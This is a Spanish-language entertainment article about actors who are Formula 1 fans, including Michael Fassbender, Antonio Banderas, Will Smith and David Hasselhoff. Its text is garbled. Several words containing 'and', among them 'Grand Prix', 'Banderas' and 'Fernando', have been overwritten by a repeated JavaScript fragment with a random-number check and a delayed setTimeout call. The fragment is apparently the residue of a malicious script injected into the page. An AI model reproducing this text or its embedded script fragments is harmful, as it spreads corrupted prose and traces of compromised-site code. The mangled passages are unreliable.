Actores fanáticos de la Fórmula 1

    Actores fanáticos de la Fórmula 1

    Actores que adoran la velocidad y la adrenalina. 

    Autor: Elizabeth Rivera 7 octubre, 2019


    FOTO: Shutterstock

    Nadie se escapa del atractivo de las carreras de autos.

     

    No cabe duda de que la Fórmula 1, o cualquier otra carrera, atrae a personas de todos los tipos, y las celebridades no podían ser la excepción. 

    Checa a estos actores que se la pasan en los premios o son amigos de pilotos famosos y más que nada, adoran la velocidad y la adrenalina. 

     

    Michael Fassbender

    View this post on Instagram

    Ready for qualifying!

    A post shared by Michael Fassbender (@michael.fassbender) on

     

    El actor irlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andés es fanático de la velocidad y de los vehículos de carreras. Se le ha visto en la zona de parrilla de los Grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes Premios, y en 2013 disfrutó del Gran Premio de Canadá con sus compañeros de X-Men. En 2012 estuvo en la celebración del Gran Prix de Mónaco.

     

    Jennifer Lawrence

     

    La actriz más sexy de Hollywood ha ido varias veces a presenciar el Gran Premio de Mónaco 2012. Ya sea que de verdad le gusten las carreras o sólo vaya como una celebrity más, nosotros estamos agradecidos de verla. 

     

    Antonio Bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderas

     

    El español no sólo es seguidor del máximo serial de automovilismo, sino que además ha apoyado públicamente a su compatriota, Fernandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Alonso. Cada vez que el actor va a un Gran Premio se da tiempo de saludar a su piloto preferido. 

     

    Will Smith

     

    Se le ha visto en muchas ocasiones en la parrilla de salida y gracias a su amistad con el británico Lewis Hamilton, siempre está en primera fila. 

     

    Cameron Diaz

     

    A la hermosa Cameron le encanta visitar El Grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Prix de Mónaco. Incluso ha visitado el pit del equipo de Mercedes AMG Petronas.

     

    Matt Le Blanc

     

    Al conocido actor de “Friends” se le ve constantemente en las carreras de autos, inclusive, sorprendió a James Calado y Adrian Sutil  en el Grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Prix de Austin en el 2013. 

     

    David Hasselhoff

    View this post on Instagram

    Gumball 18 Dublin to Bucharest!! Hoff and running

    A post shared by David Hasselhoff (@davidhasselhoff) on

     

    “The Hoff” es la cara de las carreras de Fórmula 1 desde Italia hasta Mónaco pues participa activamente y no se pierde una sola. Inclusive, aprovechó a sus más de 500 mil seguidores en Twitter para pedir por la salud de Michael Schumacher luego de accidente de 2013.

     

    Ashley Judd

     

    Esta bella actriz estuvo casada en el 2001 con el piloto escocés Dario Franchitti, quien ganó el Indianapolis 500 tres veces. En 2013, Franchitti tuvo un accidente y aunque ya estaban divorciados, ella estuvo a su lado. Él se retiró de la carrera de piloto y ella aún las frecuenta. 

     

     

     

    Temas relacionados con esta nota: , , , ,

Actores que adoran la velocidad y la adrenalina.